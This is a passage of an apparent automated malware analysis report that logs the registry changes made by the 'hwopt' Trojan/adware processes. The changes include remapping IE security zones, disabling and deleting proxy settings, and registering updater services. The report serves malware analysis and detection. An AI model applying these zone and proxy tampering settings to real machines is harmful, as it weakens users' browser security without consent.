[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"HelpLink" = "http://genisys.online"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-U38O7.tmp]
"fileman.exe" = "fileman"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Windows\hwopt_12052016001648]
"InstallUtil.exe" = ".NET Framework installation utility"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"MinorVersion" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C CF FC 37 BB 97 83 33 92 21 38 9F B3 E1 79 41"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"Inno Setup: Language" = "english"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"URLUpdateInfo" = "http://genisys.online"
"DisplayName" = "hwopt 3.0.10"
"Inno Setup: Setup Version" = "5.5.5 (a)"
"Inno Setup: App Path" = "C:\Windows\hwopt_12052016001648"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process MSIF2.tmp:3740 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 C2 FD 5A 70 39 17 49 81 4A 27 63 DF D1 78 B5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Call 2 Customer LLC\YouTube Downloader]
"YouTubeManager.exe" = "YouTubeManager"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process netsh.exe:652 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF D6 36 A2 C8 AE D8 5E E2 A0 73 28 5D CC B5 A4"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process netsh.exe:2084 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 4D BC E1 03 E4 7F 62 53 7A 4B 7C 3E 11 6B 85"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

The process InstallUtil.exe:1744 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 EB 62 C2 14 C6 CE D3 83 EA EB 7F F2 0C 05 D7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\hwopt12052016001648]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
"Sources" = "WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc, Microsoft.Transactions.Bridge 4.0.0.0, Microsoft.Transactions.Bridge 3.0.0.0, Microsoft H.323 Telephony Service Provider, Microsoft (R) Visual C# 2005 Compiler, LoadPerf, JavaQuick&"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process InstallUtil.exe:2024 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 EB 1C CA 60 F2 F5 EA 3D 0B E7 9D 6D E1 B7 8E"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\hwopt12052016001648_updater_service]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
"Sources" = "hwopt12052016001648, WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc, Microsoft.Transactions.Bridge 4.0.0.0, Microsoft.Transactions.Bridge 3.0.0.0, Microsoft H.323 Telephony Service Provider, Microsoft (R) Visual C# 2005 Compile'"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process clicker.exe:2312 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 91 5A 54 71 0D B5 48 B1 D8 4B 43 1D 9D B0 AE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process clicker.exe:2452 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 60 3D 16 B8 9A 13 85 41 83 7C B0 94 42 FD B6"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE]
"(Default)"

The process sc.exe:716 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD AB 3C 30 DE C0 5C 58 8C 18 47 13 B9 E6 46 56"

The process sc.exe:588 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 54 C9 DA 61 BF 84 13 8A CB 8A 38 B0 01 4C E8"

The process sc.exe:2000 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 7C F8 77 E5 44 32 42 9B 9A 19 FC B7 F9 0E 9C"

The process sc.exe:456 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 8D 69 2F 76 1D AC B9 25 4B 9F 92 31 38 A0 6B"

The process sc.exe:504 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 F0 4A EA EA 50 F6 55 48 7A E4 C6 20 D1 DD B4"

The process sc.exe:1752 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 77 D5 B5 17 60 81 DC C4 93 9C EB ED 46 4C 2A"

The process WindowsXP-KB968930-x86-ENG.exe:3496 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 AE 65 38 07 6A 3F 2A 99 64 0F 37 8D 48 A2 D5"

The process master.exe:1488 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 DC 1C E4 9D 82 D0 D7 13 D1 7D E9 BC F1 E1 BE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process hwopt12052016001648_updater_service.exe:380 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 8C 7D FE BA 0D E1 14 04 09 55 6E 2F 87 83 05"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\NetworkAnalyser[AUTOMATIC_UPDATE_MODULE]]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
"Sources" = "Service1, NetworkAnalyser[ADWARE_ROI], NetworkAnalyser[INSTALL_UN_INSTALL_STATU_SUPDATER], NetworkAnalyser[APP_SETTINGS], hwopt12052016001648_updater_service, hwopt12052016001648, WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The process mscorsvw.exe:4020 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 18 F6 3A C4 4E 70 EB B1 99 4C 05 FB 13 45 79"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3616 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 1F F6 AD 96 01 CB 18 7A 14 A3 28 23 1F C3 C3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2948 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 81 59 49 5F 0C 8F 69 B5 03 1A FC 4B 08 AF 04"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3756 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
"Status" = "4098"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"SIG" = "3C 55 A6 91 EF 61 21 4C 93 C9 D8 16 A5 41 D7 5A"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigMask" = "4361"
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"MVID" = "DC 19 F5 0C 5E 84 E7 22 34 33 CC 70 9E 7E B4 3F"
"Status" = "0"

